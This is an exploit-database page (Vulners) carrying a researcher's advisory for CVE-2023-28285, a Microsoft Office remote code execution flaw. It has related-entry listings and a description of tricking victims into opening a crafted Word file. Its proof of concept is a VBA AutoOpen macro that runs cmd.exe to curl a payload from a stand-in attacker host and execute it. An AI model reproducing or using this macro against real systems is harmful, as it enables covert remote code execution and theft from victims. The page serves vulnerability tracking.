Vulners
Lucene search
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit Remote Code Execution Vulnerability | 26 Jun 202300:00 | – | zdt |
 | CVE-2023-28285 | 11 Apr 202320:59 | – | circl |
 | Microsoft Office 安全漏洞 | 11 Apr 202300:00 | – | cnnvd |
 | CVE-2023-28285 | 11 Apr 202319:13 | – | cve |
 | CVE-2023-28285 Microsoft Office Remote Code Execution Vulnerability | 11 Apr 202319:13 | – | cvelist |
 | EUVD-2023-31992 | 3 Oct 202520:07 | – | euvd |
 | KLA48823 Multiple vulnerabilities in Microsoft Office | 11 Apr 202300:00 | – | kaspersky |
 | Security Updates for Microsoft Office Products (Apr 2023) (macOS) | 12 Apr 202300:00 | – | nessus |
| Security Updates for Microsoft Office Products C2R (April 2023) | 13 Apr 202300:00 | – | nessus |
 | Update now! April’s Patch Tuesday includes a fix for one zero-day | 12 Apr 202310:00 | – | malwarebytes |
10
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285
## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using a malicious `Word` file for
`Office-365 API`. After the user will open the file to read it, from
the API of Office-365, without being asked what it wants to activate,
etc, he will activate the code of the malicious server, which he will
inject himself, from this malicious server. Emedietly after this
click, the attacker can receive very sensitive information! For bank
accounts, logs from some sniff attacks, tracking of all the traffic of
the victim without stopping, and more malicious stuff, it depends on
the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim
hit the button of the exploit!
[+]PoC:
```cmd
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui",
vbNormalFocus)
End Sub
```
## FYI:
The PoC has a price and this report will be uploaded with a
description and video of how you can reproduce it only.
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
## Time spend:
01:30:00Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2023 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.8
EPSS0.01824
SSVC